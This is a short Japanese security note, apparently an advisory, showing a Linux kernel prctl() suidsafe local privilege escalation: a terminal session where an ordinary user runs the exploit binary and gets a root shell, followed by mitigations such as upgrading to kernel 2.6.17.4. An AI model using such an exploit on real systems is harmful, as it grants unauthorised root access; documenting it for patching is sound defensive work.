root権限を取得可能。
一般ユーザでログイン後、以下コマンドを実行する。
$ id
uid=502(testuser) gid=503(testuser) 所属グループ=503(testuser)
$
$ ./linux-kernel-prctl
prctl() suidsafe exploit
(C) Julien TINNES
[+] Installed signal handler
[+] We are suidsafe dumpable!
[+] Malicious string forged
[+] Segfaulting child
[+] Waiting for exploit to succeed (~59 seconds)
[+] getting root shell
sh-3.00#
sh-3.00# id
uid=0(root) gid=0(root) 所属グループ=503(testuser)
sh-3.00#
Kernelを 2.6.17.4 にバージョンアップ
各ディストリビューションのkernelアップデート
厳密なユーザ管理(パスワードの再考、不要なユーザの削除等)